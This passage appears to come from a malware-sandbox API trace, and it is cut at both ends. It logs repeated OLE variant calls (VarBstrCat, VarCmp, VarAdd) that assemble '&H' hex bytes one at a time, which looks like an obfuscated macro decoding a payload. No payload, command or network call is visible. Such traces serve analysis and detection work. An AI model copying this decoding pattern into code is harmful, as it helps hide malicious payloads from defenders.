pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.891] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.891] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.891] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.891] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.891] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.891] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.891] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.891] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.891] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.891] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.891] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.891] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.891] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.892] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.892] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.892] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.892] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.892] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.892] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.892] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.892] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.892] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.892] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.892] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.892] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.892] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.893] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.893] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.893] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.893] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.893] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.893] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.893] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.893] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.893] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.893] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.893] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.893] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.893] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.894] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.894] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.894] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.894] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.894] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.894] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.894] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.894] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.894] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.894] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.895] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.895] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.895] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.895] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.895] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.895] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.895] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.895] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.895] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.895] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.895] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.895] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.895] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.896] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.896] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.896] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.896] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.896] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.897] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.897] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.897] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.897] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.897] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.897] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.897] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.897] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.897] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.897] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.897] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.897] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.898] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.898] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.898] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.898] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.898] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.898] VarBstrCat (in: bstrLeft="&He", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.898] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.899] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.899] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.899] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.899] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.899] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.899] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.900] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.900] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.900] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.900] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.900] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.900] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.900] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.901] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.901] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.901] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.901] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.901] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.901] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.901] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.901] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.901] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.901] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.901] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.901] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.901] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.902] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.902] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.902] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.902] VarBstrCat (in: bstrLeft="&H4", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.902] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.902] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.902] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.902] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.902] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.902] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.902] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.902] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.902] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.903] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.903] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.903] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.903] VarBstrCat (in: bstrLeft="&Hc", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.903] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.903] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.903] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.903] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.903] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.903] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.903] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.903] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.903] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.904] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.904] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.904] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.904] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.904] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.904] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.904] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.904] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.904] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.904] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.904] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.904] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.904] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.904] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.905] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.905] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.905] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.905] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.905] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.905] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.905] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.905] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.905] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.905] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.905] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.905] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.905] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.906] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.906] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.906] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.906] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.906] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.906] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.906] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.906] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.906] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.906] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.906] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.906] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.906] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.907] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.907] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.907] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.907] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.907] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.907] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.908] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.908] 